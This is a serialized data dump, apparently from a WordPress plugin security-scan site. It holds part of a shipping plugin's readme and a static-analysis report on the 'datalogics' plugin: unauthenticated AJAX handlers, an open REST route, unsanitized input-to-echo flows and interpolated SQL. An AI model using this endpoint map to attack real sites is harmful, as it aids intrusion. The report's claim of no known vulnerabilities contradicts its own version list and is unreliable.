delivery\u003C\u002Fli>\n\u003Cli>ISGAV\u003C\u002Fli>\n\u003Cli>Davar Rishon\u003C\u002Fli>\n\u003Cli>YDM\u003C\u002Fli>\n\u003Cli>CARGO\u003C\u002Fli>\n\u003Cli>Sosna\u003C\u002Fli>\n\u003Cli>Buzzer\u003C\u002Fli>\n\u003Cli>ZigZag\u003C\u002Fli>\n\u003Cli>Sdeliveries\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Didn’t see your courier service listed? No problem! Contact us, and we’ll add your preferred shipping company.\u003C\u002Fp>\n\u003Ch3>ShippinGo Ecommerce Delivery – Seamlessly Sync Your WooCommerce Orders with All Delivery Services\u003C\u002Fh3>\n\u003Cp>ShippinGo Ecommerce Delivery is your go-to solution for automating the shipping process of your WooCommerce store. This plugin allows you to sync your orders with a wide range of delivery companies, streamlining your shipping operations.\u003C\u002Fp>\n\u003Ch4>Plugin Features\u003C\u002Fh4>\n\u003Col>\n\u003Cli>\u003Cstrong>Standard Delivery (Door to Door)\u003C\u002Fstrong>: Easily manage regular deliveries straight to your customers’ doors.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Reverse Delivery\u003C\u002Fstrong>: Simplify the process of returning items from customers back to your location.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Govina Delivery\u003C\u002Fstrong>: Handle complex shipping scenarios involving multiple destinations, including receiving payments from customers.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Double Shipping\u003C\u002Fstrong>: Manage complex shipping scenarios involving multiple destinations.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Bulk Shipment Creation\u003C\u002Fstrong>: Efficiently create multiple shipments at once.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Pickup Point Collection – Map Selection\u003C\u002Fstrong>: Allow customers to choose pickup points via an interactive map (Google Maps supported).\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Pickup Point Collection – List Selection\u003C\u002Fstrong>: Offer a list-based selection of pickup points for customers.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Shipping Label Printing\u003C\u002Fstrong>: Generate and print shipping labels with just a few clicks.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Bulk Shipping Label Printing\u003C\u002Fstrong>: Bulk generate and print shipping labels with just a few clicks.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Delivery Status Updates\u003C\u002Fstrong>: Receive real-time updates on the status of deliveries.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Delivery Cancellation\u003C\u002Fstrong>: Cancel shipments directly from your WooCommerce dashboard.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch4>Setting Up an Account\u003C\u002Fh4>\n\u003Cp>Need help with installation? Check out our \u003Ca href=\"https:\u002F\u002Fwww.shippingo.ai\u002Finstallation\" rel=\"nofollow ugc\">Plugin Installation Guide\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch3>External Services\u003C\u002Fh3>\n\u003Cp>This plugin integrates with external services to provide its functionality. Below are the details of the third-party services used by the plugin:\u003C\u002Fp>\n\u003Ch3>1. Shippingo Platform API\u003C\u002Fh3>\n\u003Cp>\u003Cstrong>Service Description\u003C\u002Fstrong>:\u003Cbr \u002F>\nThis plugin connects to the Shippingo Platform API to manage shipping processes, including order registration and label generation.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Data Sent\u003C\u002Fstrong>:\u003Cbr \u002F>\n– \u003Cstrong>Account creation\u003C\u002Fstrong>: There is a registraion form to create your account in Shippingo.\u003Cbr \u002F>\n– \u003Cstrong>Order Data\u003C\u002Fstrong>: Each time an order is added or updated, the corresponding order data is sent.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Conditions for Data Transmission\u003C\u002Fstrong>:\u003Cbr \u002F>\n– Data is sent when the user interacts with the plugin to register an order or generate a shipping label.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Terms of Service and Privacy Policy\u003C\u002Fstrong>:\u003Cbr \u002F>\n– \u003Ca href=\"https:\u002F\u002Fshippingo.ai\u002Fterms\" rel=\"nofollow ugc\">Shippingo Terms of Service\u003C\u002Fa>\u003Cbr \u002F>\n– \u003Ca href=\"https:\u002F\u002Fshippingo.ai\u002Fprivacy\" rel=\"nofollow ugc\">Shippingo Privacy Policy\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>2. Shipping Label Generation\u003C\u002Fh3>\n\u003Cp>\u003Cstrong>Service Description\u003C\u002Fstrong>:\u003Cbr \u002F>\nThis service is used to generate shipping labels for orders processed through the Shippingo platform.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Data Sent\u003C\u002Fstrong>:\u003Cbr \u002F>\n– \u003Cstrong>Label Request\u003C\u002Fstrong>: When a shipment is created, the plugin sends the order ID and any other necessary data to the Shippingo platform to generate a shipping label.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Conditions for Data Transmission\u003C\u002Fstrong>:\u003Cbr \u002F>\n– Data is transmitted each time a shipping label is requested.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Terms of Service and Privacy Policy\u003C\u002Fstrong>:\u003Cbr \u002F>\n– \u003Ca href=\"https:\u002F\u002Fshippingo.ai\u002Fterms\" rel=\"nofollow ugc\">Shippingo Terms of Service\u003C\u002Fa>\u003Cbr \u002F>\n– \u003Ca href=\"https:\u002F\u002Fshippingo.ai\u002Fprivacy\" rel=\"nofollow ugc\">Shippingo Privacy Policy\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Additional Information\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>All requests to the Shippingo Platform API are made using secure HTTPS protocols to ensure data protection.\u003C\u002Fli>\n\u003C\u002Ful>\n","ShippinGo Ecommerce Delivery enables seamless syncing of your WooCommerce orders with a variety of delivery companies, automating the entire shipping  …",992,"2024-10-30T12:23:00.000Z","6.6.5","5.7.0",[161,20,163,181],"ydm","https:\u002F\u002Fwww.shippingo.ai","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshippingo.1.0.16.zip",92,{"attackSurface":186,"codeSignals":405,"taintFlows":552,"riskAssessment":634,"analyzedAt":645},{"hooks":187,"ajaxHandlers":351,"restRoutes":388,"shortcodes":397,"cronEvents":401,"entryPointCount":404,"unprotectedCount":14},[188,195,200,204,208,212,216,220,224,228,232,236,239,244,249,253,257,261,266,270,274,276,279,282,285,289,293,297,302,305,309,313,317,320,324,328,332,336,340,344,347],{"type":189,"name":190,"callback":191,"priority":192,"file":193,"line":194},"action","woocommerce_order_status_changed","datalogics_order_status_change",10,"actions.php",411,{"type":196,"name":197,"callback":198,"file":193,"line":199},"filter","cron_schedules","datalogics_set_crons",585,{"type":189,"name":201,"callback":202,"file":193,"line":203},"datalogics_update_locations_schedule","datalogics_update_locations",592,{"type":196,"name":205,"callback":206,"file":193,"line":207},"woocommerce_email_classes","datalogics_filter_woocommerce_email_classes",868,{"type":196,"name":209,"callback":210,"priority":192,"file":193,"line":211},"update_post_metadata","closure",915,{"type":196,"name":213,"callback":214,"file":193,"line":215},"body_class","datalogics_tracking_custom_body_class",1024,{"type":189,"name":217,"callback":218,"file":193,"line":219},"woocommerce_product_options_inventory_product_data","datalogics_optical_woocommerce_product_custom_fields",1701,{"type":189,"name":221,"callback":222,"file":193,"line":223},"woocommerce_process_product_meta","datalogics_pickup_woocommerce_product_custom_fields_save",1734,{"type":189,"name":225,"callback":226,"priority":192,"file":193,"line":227},"woocommerce_email_after_order_table","datalogics_add_custom_information_to_order_email",1798,{"type":189,"name":229,"callback":230,"file":193,"line":231},"rest_api_init","datalogics_register_locations_endpoint",1818,{"type":189,"name":233,"callback":234,"file":193,"line":235},"wp_enqueue_scripts","datalogics_enqueue_checkout_scripts",1881,{"type":189,"name":229,"callback":237,"file":49,"line":238},"datalogics_register_api_routes",38,{"type":189,"name":240,"callback":241,"file":242,"line":243},"datalogics_shipping_customer_shipping_email","trigger","class_wc_shipping_order_email.php",36,{"type":196,"name":245,"callback":246,"priority":192,"file":247,"line":248},"plugin_action_links","datalogics_add_plugin_settings_link","data.php",16,{"type":189,"name":250,"callback":251,"file":247,"line":252},"admin_menu","datalogics_woo_plugin_add_menu_entries",18,{"type":189,"name":254,"callback":255,"file":247,"line":256},"admin_head","datalogics_plugin_menu_icon",64,{"type":189,"name":258,"callback":259,"file":247,"line":260},"admin_enqueue_scripts","datalogics_enqueue_admin_styles",69,{"type":196,"name":262,"callback":263,"priority":264,"file":247,"line":265},"woocommerce_account_menu_items","datalogics_shipment_track_log_history_link",40,181,{"type":189,"name":267,"callback":268,"file":247,"line":269},"init","datalogics_shipment_track_add_endpoint",196,{"type":189,"name":271,"callback":272,"file":247,"line":273},"woocommerce_account_d-shipment-tracking_endpoint","datalogics_shipment_tracking_my_account_endpoint_content",201,{"type":189,"name":267,"callback":210,"file":247,"line":275},211,{"type":189,"name":277,"callback":210,"file":247,"line":278},"template_include",216,{"type":196,"name":280,"callback":210,"file":247,"line":281},"the_content",223,{"type":189,"name":267,"callback":283,"file":247,"line":284},"datalogics_load_textdomain_panel",263,{"type":189,"name":258,"callback":286,"file":287,"line":288},"datalogics_my_script_enqueue","orders.php",48,{"type":196,"name":290,"callback":291,"file":287,"line":292},"admin_footer","datalogics_add_filter_shipping",112,{"type":189,"name":294,"callback":295,"file":287,"line":296},"add_meta_boxes","datalogics_add_meta_boxes",276,{"type":196,"name":298,"callback":299,"priority":300,"file":287,"line":301},"manage_edit-shop_order_columns","datalogics_orders_column",20,689,{"type":196,"name":303,"callback":299,"file":287,"line":304},"manage_woocommerce_page_wc-orders_columns",690,{"type":189,"name":306,"callback":307,"file":287,"line":308},"manage_shop_order_posts_custom_column","datalogics_orders_column_populate_legacy",877,{"type":189,"name":310,"callback":311,"priority":192,"file":287,"line":312},"manage_woocommerce_page_wc-orders_custom_column","datalogics_orders_column_populate_hpos",878,{"type":189,"name":314,"callback":210,"file":315,"line":316},"admin_notices","shipping_class.php",54,{"type":189,"name":233,"callback":318,"file":315,"line":319},"datalogics_enque_map",126,{"type":189,"name":321,"callback":322,"file":315,"line":323},"woocommerce_shipping_init","datalogics_pickup_shipping_method",128,{"type":196,"name":325,"callback":326,"file":315,"line":327},"woocommerce_shipping_methods","add_datalogics_pickup_shipping_method",981,{"type":189,"name":329,"callback":330,"priority":192,"file":315,"line":331},"woocommerce_after_checkout_form","datalogics_add_checkout_popup",996,{"type":189,"name":333,"callback":334,"priority":300,"file":315,"line":335},"woocommerce_after_shipping_rate","datalogics_add_checkout_item_pickup_location_field",1108,{"type":189,"name":337,"callback":338,"priority":192,"file":315,"line":339},"woocommerce_after_checkout_validation","datalogics_validate_location",1281,{"type":196,"name":341,"callback":342,"file":315,"line":343},"woocommerce_checkout_fields","datalogics_add_n_code_fields",1343,{"type":189,"name":345,"callback":210,"priority":192,"file":315,"line":346},"woocommerce_store_api_checkout_update_order_from_request",1367,{"type":189,"name":348,"callback":349,"file":315,"line":350},"woocommerce_checkout_update_order_meta","datalogics_save_n_code",1379,[352,355,358,361,364,367,370,373,376,378,381,383,386],{"action":353,"nopriv":118,"callback":353,"hasNonce":52,"hasCapCheck":118,"file":193,"line":354},"datalogics_register",4,{"action":356,"nopriv":118,"callback":356,"hasNonce":52,"hasCapCheck":118,"file":193,"line":357},"datalogics_validate_key",75,{"action":359,"nopriv":118,"callback":359,"hasNonce":52,"hasCapCheck":118,"file":193,"line":360},"datalogics_update_shipment_data",197,{"action":362,"nopriv":118,"callback":362,"hasNonce":52,"hasCapCheck":118,"file":193,"line":363},"datalogics_add_order",242,{"action":365,"nopriv":118,"callback":365,"hasNonce":52,"hasCapCheck":118,"file":193,"line":366},"datalogics_log_print",615,{"action":368,"nopriv":118,"callback":368,"hasNonce":52,"hasCapCheck":118,"file":193,"line":369},"datalogics_create_shipping",648,{"action":371,"nopriv":118,"callback":371,"hasNonce":52,"hasCapCheck":118,"file":193,"line":372},"datalogics_cancel_shipping",778,{"action":374,"nopriv":118,"callback":374,"hasNonce":52,"hasCapCheck":118,"file":193,"line":375},"datalogics_get_locations",960,{"action":374,"nopriv":52,"callback":374,"hasNonce":52,"hasCapCheck":118,"file":193,"line":377},961,{"action":379,"nopriv":118,"callback":379,"hasNonce":52,"hasCapCheck":118,"file":193,"line":380},"datalogics_track_shipping",1442,{"action":379,"nopriv":52,"callback":379,"hasNonce":52,"hasCapCheck":118,"file":193,"line":382},1443,{"action":384,"nopriv":118,"callback":384,"hasNonce":52,"hasCapCheck":118,"file":193,"line":385},"datalogics_get_close_locations",1592,{"action":384,"nopriv":52,"callback":384,"hasNonce":52,"hasCapCheck":118,"file":193,"line":387},1593,[389],{"namespace":390,"route":391,"methods":392,"callback":394,"permissionCallback":395,"file":193,"line":396},"datalogics\u002Fv1","\u002Fget-locations",[393],"GET","datalogics_get_locations_callback","__return_true",1821,[398],{"tag":399,"callback":399,"file":193,"line":400},"datalogics_shipping_tracker",1020,[402],{"hook":201,"callback":201,"file":193,"line":403},590,15,{"dangerousFunctions":406,"sqlUsage":407,"outputEscaping":415,"fileOperations":27,"externalRequests":46,"nonceChecks":192,"capabilityChecks":27,"bundledLibraries":551},[],{"prepared":26,"raw":26,"locations":408},[409,413],{"file":410,"line":411,"context":412},"table.php",44,"$wpdb->get_var() with variable interpolation",{"file":410,"line":414,"context":412},72,{"escaped":416,"rawEcho":417,"locations":418},369,68,[419,422,424,425,427,429,430,431,433,435,437,439,441,443,445,447,449,451,453,455,457,459,461,463,465,467,469,471,473,475,477,479,481,483,485,487,489,491,493,495,497,499,501,503,505,507,509,511,513,514,516,518,520,522,524,526,527,529,531,533,536,539,541,544,546,548,549,550],{"file":420,"line":264,"context":421},"account.php","raw output",{"file":420,"line":423,"context":421},42,{"file":420,"line":288,"context":421},{"file":420,"line":426,"context":421},55,{"file":420,"line":428,"context":421},62,{"file":420,"line":256,"context":421},{"file":420,"line":417,"context":421},{"file":420,"line":432,"context":421},70,{"file":420,"line":434,"context":421},73,{"file":420,"line":436,"context":421},79,{"file":420,"line":438,"context":421},81,{"file":420,"line":440,"context":421},82,{"file":420,"line":442,"context":421},89,{"file":420,"line":444,"context":421},90,{"file":193,"line":446,"context":421},1139,{"file":193,"line":448,"context":421},1170,{"file":193,"line":450,"context":421},1183,{"file":193,"line":452,"context":421},1187,{"file":193,"line":454,"context":421},1190,{"file":193,"line":456,"context":421},1237,{"file":193,"line":458,"context":421},1241,{"file":193,"line":460,"context":421},1274,{"file":193,"line":462,"context":421},1290,{"file":193,"line":464,"context":421},1291,{"file":193,"line":466,"context":421},1292,{"file":193,"line":468,"context":421},1293,{"file":193,"line":470,"context":421},1294,{"file":193,"line":472,"context":421},1295,{"file":193,"line":474,"context":421},1296,{"file":193,"line":476,"context":421},1362,{"file":193,"line":478,"context":421},1372,{"file":193,"line":480,"context":421},1376,{"file":193,"line":482,"context":421},1664,{"file":193,"line":484,"context":421},1670,{"file":193,"line":486,"context":421},1688,{"file":193,"line":488,"context":421},1781,{"file":193,"line":490,"context":421},1783,{"file":247,"line":492,"context":421},204,{"file":247,"line":494,"context":421},237,{"file":287,"line":496,"context":421},132,{"file":287,"line":498,"context":421},142,{"file":287,"line":500,"context":421},154,{"file":287,"line":502,"context":421},162,{"file":287,"line":504,"context":421},163,{"file":287,"line":506,"context":421},164,{"file":287,"line":508,"context":421},176,{"file":287,"line":510,"context":421},185,{"file":287,"line":512,"context":421},194,{"file":315,"line":400,"context":421},{"file":315,"line":515,"context":421},1021,{"file":315,"line":517,"context":421},1028,{"file":315,"line":519,"context":421},1032,{"file":315,"line":521,"context":421},1037,{"file":315,"line":523,"context":421},1041,{"file":315,"line":525,"context":421},1087,{"file":315,"line":525,"context":421},{"file":315,"line":528,"context":421},1089,{"file":315,"line":530,"context":421},1133,{"file":315,"line":532,"context":421},1161,{"file":534,"line":535,"context":421},"templates\\emails\\custom-email.php",5,{"file":537,"line":538,"context":421},"templates\\emails\\customer-note.php",63,{"file":537,"line":540,"context":421},65,{"file":542,"line":543,"context":421},"templates\\emails\\plain\\customer-note.php",25,{"file":542,"line":545,"context":421},26,{"file":542,"line":547,"context":421},34,{"file":542,"line":417,"context":421},{"file":542,"line":260,"context":421},{"file":542,"line":434,"context":421},[],[553,571,590,599,623],{"entryPoint":554,"graph":555,"unsanitizedCount":27,"severity":570},"datalogics_validate_key (actions.php:76)",{"nodes":556,"edges":568},[557,562],{"id":558,"type":559,"label":560,"file":193,"line":561},"n0","source","$_POST",93,{"id":563,"type":564,"label":565,"file":193,"line":566,"wp_function":567},"n1","sink","update_option() [Settings Manipulation]",95,"update_option",[569],{"from":558,"to":563,"sanitized":52},"low",{"entryPoint":572,"graph":573,"unsanitizedCount":27,"severity":570},"datalogics_shipping_tracker (actions.php:1022)",{"nodes":574,"edges":587},[575,578,581,585],{"id":558,"type":559,"label":576,"file":193,"line":577},"$_GET['tracking']",1066,{"id":563,"type":564,"label":579,"file":193,"line":577,"wp_function":580},"echo() [XSS]","echo",{"id":582,"type":559,"label":583,"file":193,"line":584},"n2","$_GET['order']",1067,{"id":586,"type":564,"label":579,"file":193,"line":584,"wp_function":580},"n3",[588,589],{"from":558,"to":563,"sanitized":52},{"from":582,"to":586,"sanitized":52},{"entryPoint":591,"graph":592,"unsanitizedCount":27,"severity":570},"datalogics_get_close_locations (actions.php:1597)",{"nodes":593,"edges":597},[594,596],{"id":558,"type":559,"label":560,"file":193,"line":595},1607,{"id":563,"type":564,"label":579,"file":193,"line":482,"wp_function":580},[598],{"from":558,"to":563,"sanitized":52},{"entryPoint":600,"graph":601,"unsanitizedCount":27,"severity":570},"\u003Cactions> (actions.php:0)",{"nodes":602,"edges":618},[603,604,605,606,607,609,611,615],{"id":558,"type":559,"label":560,"file":193,"line":561},{"id":563,"type":564,"label":565,"file":193,"line":566,"wp_function":567},{"id":582,"type":559,"label":576,"file":193,"line":577},{"id":586,"type":564,"label":579,"file":193,"line":577,"wp_function":580},{"id":608,"type":559,"label":583,"file":193,"line":584},"n4",{"id":610,"type":564,"label":579,"file":193,"line":584,"wp_function":580},"n5",{"id":612,"type":559,"label":613,"file":193,"line":614},"n6","$_POST (x7)",784,{"id":616,"type":564,"label":579,"file":193,"line":617,"wp_function":580},"n7",1094,[619,620,621,622],{"from":558,"to":563,"sanitized":52},{"from":582,"to":586,"sanitized":52},{"from":608,"to":610,"sanitized":52},{"from":612,"to":616,"sanitized":52},{"entryPoint":624,"graph":625,"unsanitizedCount":27,"severity":570},"\u003Corders> (orders.php:0)",{"nodes":626,"edges":632},[627,630],{"id":558,"type":559,"label":628,"file":287,"line":629},"$_GET (x4)",295,{"id":563,"type":564,"label":579,"file":287,"line":631,"wp_function":580},479,[633],{"from":558,"to":563,"sanitized":52},{"summary":635,"deductions":636},"The datalogics plugin v2.6.63 demonstrates a generally good security posture with several positive indicators. The absence of known vulnerabilities in its history is a significant strength.  Static analysis reveals a relatively low number of entry points, with only one out of fifteen found to be unprotected.  Furthermore, the plugin exhibits strong practices in output escaping, with 84% of outputs being properly escaped, and shows no critical or high severity taint flows, indicating safe handling of user-supplied data.  The plugin also avoids dangerous functions and file operations, and doesn't bundle external libraries which could introduce vulnerabilities if outdated.\n\nHowever, there are areas that warrant attention. The presence of 13 AJAX handlers and 1 REST API route without explicit permission callbacks represents a potential risk. While the total number of unprotected entry points is low, these specific instances could be exploited if not adequately secured by other means. The 50% usage of prepared statements for SQL queries, while not ideal, suggests that half of its database interactions might be vulnerable to SQL injection if the non-prepared queries are handling user-supplied data without proper sanitization. The plugin's reliance on external HTTP requests, though not inherently a vulnerability, adds a layer of dependency that could be a vector if those external services are compromised.\n\nIn conclusion, datalogics v2.6.63 is a well-maintained plugin with a clean vulnerability history and good output sanitization. The primary concerns revolve around the potential for unauthorized access via unprotected AJAX and REST API endpoints, and the less-than-ideal SQL query practices. Addressing these specific areas would further strengthen its security. The lack of known historical vulnerabilities is a strong positive indicator of ongoing security efforts.",[637,640,643],{"reason":638,"points":639},"Unprotected REST API route",7,{"reason":641,"points":642},"AJAX handlers without auth checks",6,{"reason":644,"points":535},"SQL queries not using prepared statements","2026-03-16T19:42:17.175Z",{"wat":647,"direct":656},{"assetPaths":648,"generatorPatterns":651,"scriptPaths":652,"versionParams":653},[649,650],"\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fcss\u002Fstyle_admin.css","\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fjs\u002Fsettings.js",[],[650],[654,655],"datalogics\u002Fcss\u002Fstyle_admin.css?ver=","datalogics\u002Fjs\u002Fsettings.js?ver=",{"cssClasses":657,"htmlComments":672,"htmlAttributes":673,"restEndpoints":681,"jsGlobals":683,"shortcodeOutput":685},[658,659,660,661,662,663,664,665,666,667,668,669,670,671],"datalogics-dsb-spinner","dsp-box","dsp-box-content","dsp-license","dsp-hide","dsp-key","dsp-button","dsp-validation","valid","invalid","dsp-products","dsp-products-title","dsp-products-subtitle","dsp-products-list",[],[674,675,676,677,678,679,680],"id=\"datalogics_loader_con\"","id=\"datalogics_loader_text\"","id=\"pluginwrap\"","class=\"settings-page\"","id=\"datalogics_token\"","id=\"datalogics_register\"","id=\"datalogics_check_key\"",[682],"\u002Fwp-json\u002Fdatalogics\u002Fv1\u002Fw_register",[684],"datalogics_data_settings",[],{"slug":4,"current_version":6,"total_versions":243,"versions":687},[688,693,699,707,715,722,731,740,749,758,767,776,785,794,803,812,821,830,839,848,857,866,875,884,893,902,911,920,929,938,947,956,965,974,983,992],{"version":6,"download_url":24,"svn_tag_url":689,"released_at":36,"has_diff":118,"diff_files_changed":690,"diff_lines":36,"trac_diff_url":691,"vulnerabilities":692,"is_current":52},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.64\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.63&new_path=%2Fdatalogics%2Ftags%2F2.6.64",[],{"version":38,"download_url":694,"svn_tag_url":695,"released_at":36,"has_diff":118,"diff_files_changed":696,"diff_lines":36,"trac_diff_url":697,"vulnerabilities":698,"is_current":118},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.63.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.63\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.62&new_path=%2Fdatalogics%2Ftags%2F2.6.63",[],{"version":700,"download_url":701,"svn_tag_url":702,"released_at":36,"has_diff":118,"diff_files_changed":703,"diff_lines":36,"trac_diff_url":704,"vulnerabilities":705,"is_current":118},"2.6.62","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.62.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.62\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.61&new_path=%2Fdatalogics%2Ftags%2F2.6.62",[706],{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":708,"download_url":709,"svn_tag_url":710,"released_at":36,"has_diff":118,"diff_files_changed":711,"diff_lines":36,"trac_diff_url":712,"vulnerabilities":713,"is_current":118},"2.6.61","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.61.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.61\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.60&new_path=%2Fdatalogics%2Ftags%2F2.6.61",[714],{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":111,"download_url":716,"svn_tag_url":717,"released_at":36,"has_diff":118,"diff_files_changed":718,"diff_lines":36,"trac_diff_url":719,"vulnerabilities":720,"is_current":118},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.60.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.60\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.59&new_path=%2Fdatalogics%2Ftags%2F2.6.60",[721],{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":723,"download_url":724,"svn_tag_url":725,"released_at":36,"has_diff":118,"diff_files_changed":726,"diff_lines":36,"trac_diff_url":727,"vulnerabilities":728,"is_current":118},"2.6.59","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.59.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.59\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.58&new_path=%2Fdatalogics%2Ftags%2F2.6.59",[729,730],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":732,"download_url":733,"svn_tag_url":734,"released_at":36,"has_diff":118,"diff_files_changed":735,"diff_lines":36,"trac_diff_url":736,"vulnerabilities":737,"is_current":118},"2.6.58","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.58.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.58\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.56&new_path=%2Fdatalogics%2Ftags%2F2.6.58",[738,739],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":741,"download_url":742,"svn_tag_url":743,"released_at":36,"has_diff":118,"diff_files_changed":744,"diff_lines":36,"trac_diff_url":745,"vulnerabilities":746,"is_current":118},"2.6.56","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.56.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.56\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.55&new_path=%2Fdatalogics%2Ftags%2F2.6.56",[747,748],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":750,"download_url":751,"svn_tag_url":752,"released_at":36,"has_diff":118,"diff_files_changed":753,"diff_lines":36,"trac_diff_url":754,"vulnerabilities":755,"is_current":118},"2.6.55","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.55.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.55\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.52&new_path=%2Fdatalogics%2Ftags%2F2.6.55",[756,757],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":759,"download_url":760,"svn_tag_url":761,"released_at":36,"has_diff":118,"diff_files_changed":762,"diff_lines":36,"trac_diff_url":763,"vulnerabilities":764,"is_current":118},"2.6.52","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.52.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.52\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.51&new_path=%2Fdatalogics%2Ftags%2F2.6.52",[765,766],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":768,"download_url":769,"svn_tag_url":770,"released_at":36,"has_diff":118,"diff_files_changed":771,"diff_lines":36,"trac_diff_url":772,"vulnerabilities":773,"is_current":118},"2.6.51","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.51.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F2.6.51\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdatalogics%2Ftags%2F2.6.50&new_path=%2Fdatalogics%2Ftags%2F2.6.51",[774,775],{"id":106,"url_slug":107,"title":108,"severity":39,"cvss_score":40,"vuln_type":112,"patched_in_version":111},{"id":32,"url_slug":33,"title":34,"severity":39,"cvss_score":40,"vuln_type":42,"patched_in_version":38},{"version":777,"download_url":778,"svn_tag_url":779,"released_at":36,"has_diff":118,"diff_files_changed":780,"diff_lines":36,"trac_diff_url":781,"vulnerabilities":782,"is_current":118},"2.6.50","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.50.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdatalogics\u002Ftags\u002F